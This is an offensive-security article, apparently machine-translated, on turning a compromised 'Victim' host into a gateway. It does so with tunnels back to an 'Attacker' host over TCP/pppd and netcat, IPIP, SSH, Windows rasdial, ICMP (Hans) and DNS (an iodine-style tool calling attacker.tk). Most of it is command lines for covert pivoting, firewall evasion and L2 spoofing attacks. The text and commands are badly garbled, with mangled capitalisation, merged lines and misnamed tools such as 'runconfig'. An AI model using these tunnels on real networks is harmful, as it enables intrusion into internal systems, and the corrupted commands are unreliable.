VPN tunnels are designed to provide the attacker with full-fledged access to the internal network or isolated VLAN and open the opportunity for further comfortable promotion.
In this article, I will show how to create a VPN tunel in Windows and Linux via TCP (L3-tunnel), ICMP, DNS and through SSH (L2/L3-tunnels).
Setting up VPN tunnels
All examples of using tunnels require administrator or root.
VPN tunnel via TCP in one command (L3-tunnel)
In Linux, we can very elegantly raise the tunnel without using the customizable VPN server:
|12||Attacker> SUDO PPPD Noauth PTY ‘NC -KLP 5555’Victim#> PPPD NoUute Persist Pty ‘NC Attacker 5555’ 172.16.0.1: 172.16.0.2|
The tunnel was created. Now, to turn Victim into Gateway, you need to do the following:
|12||Victim#> Echo 1 > /ProC/SYS/Net/IPV4/IP_Forwardvictim#> iptables -t nat -a postrouting -o eth0 -j masquarade|
Finished, from this moment we can direct traffic to the internal network as it is, using only roaring:
|1||Attacker> Sudo Route Add -net 10.0.0.0/8 DEV tun0|
It is worth noting that, using PPPD, we can create a tunnel on the initiative of any of the parties (Victim or Attacker). This means that we got the opportunity to get around the problems with the inters grinding screens. Work requires nuclear support (PPP_GENERIC module).
And here is another way to raise the tunnel using IPIP:
|1234||Attacker> SUDO IP Tunnel Add Tun0 Mode IPIP Remote Victim Local Attacker Dev Eth0attacker> Sudo runconfig tun0 172.16.0.2/30 Pointopoint 172.16.0.1victim#> IP Tunnel Add Tun0 Mode IPIP Remote Attacker Local Victim Dev Eth0victim#> runconfig tun0 172.16.0.1/30 Pointopoint 172.16.0.2|
VPN tunnel via SSH (L2/L3-tunnels)
If Victim or Attacker has a SSH server, then this is enough to create VPN. First, you need to allow the connection of in/etc/ssh/sshd_config:
After that, you can create a connection:
|123456||Attacker> SUDO SSH -N tun@victim -w 0: 0attacker> Sudo runconfig tun0 172.16.0.1/30 Pointopoint 172.16.0.2Victim#> runconfig tun0 172.16.0.2/30 Pointopoint 172.16.0.1attacker> Sudo Route Add -net 10.0.0.0/8 DEV tun0victim#> Echo 1 > /ProC/SYS/Net/IPV4/IP_Forwardvictim#> iptables -t nat -a postrouting -o eth0 -j masquarade|
To organize access to the L3-Tunnel network will be enough. But if we want to not just score ports, but perform attacks such as ARP/NBNS/DHCP-Spoofing, you will need L2-tunnel. To do this, prescribe in/etc/ssh/sshd_config the following:
Restart the SSH server and perform the connection:
|123||Attacker> SUDO SSH ROOTIM -O TUNNEL = Ethernet -W Any: Anyvictim#> BRCTL Addbr BR0;BRCTL Addif BR0 ETH0;BRCTL Addif BR0 TAP0;IFCONFIG ETH0 0 PrOMISC;IFCONFIG BR0 10.0.0.70/24attacker> Sudo DHCLENT TAP0|
As always, with L2-tunnels you need to be very careful: due to the slightest error when creating bridges, a remote machine will go into eternal offline.
VPN tunnels on Windows
Windows from the box also supports VPN (in the PPTP/L2TP version). Moreover, you can control from the command line thanks to the built -in component:
|1||Victim#> Rasdial.Exe Netname Username * /Phonebook: Network.ini|
Config for Network.Ini looks as follows:
|12345||[Netname] Media = Rastapiport = VPN9-0DEVICE = RASTAPIPHONENENUMBER = Attacker|
Disconnect the VPN connection by the following command:
|1||Victim#> Rasdial Netname /Disconnect|
Do not forget about the classic OpenVPN, which works great on both Linux and Windows. In the presence of administrator rights, its use should not cause problems.
The exotic, but effective method of L2-tunity on Windows through virtualization was also described in this article.
VPN tunnel via ICMP
If the Internet access is prohibited, but the pings are allowed, then you can use Hans and create L3-Tunnel in two commands (172.16.0.1 on Attacker and 172.16.0.10 on Victim):
|12||Attacker> Sudo ./Hans -s 172.16.0.1 -p passwdvictim#> ./hans -c Attacker -p passwd -a 172.16.0.10|
The client side for Windows works similarly, but the work will require a TAP interface that can be created using OpenVPN.
VPN tunnel via DNS
The last time we return to DNS. If the DNS settings are allowed by resolves of arbitrary domains, which happens often enough, then with the help of iDine we can create a full-fledged L3-Tunnel (172.16.0.1 on Attacker and 172.16.0.2 on Victim):
|12||Attacker> Sudo ./iDined -f 172.16.0.1 -p Passwd Attacker.tkvictim#> ./iDine -f -p passwd attacker.TK|
More on the topic: Sprouting the Internet on DNS
VPN tunnels can be organized both directly between Attacker and Victim, and a combination of different port execution techniques. For example, we can use the DNS2TCP + PPPD combination instead of the iDine DNS tunnel.
Summing up, I would add that the use of VPN tunnels, although it gives comfortable access to the network, is still not a mandatory stage in penetration. If this cannot be done easily, then spending time on trabrishing is inappropriate. Almost always enough good good proxification of traffic.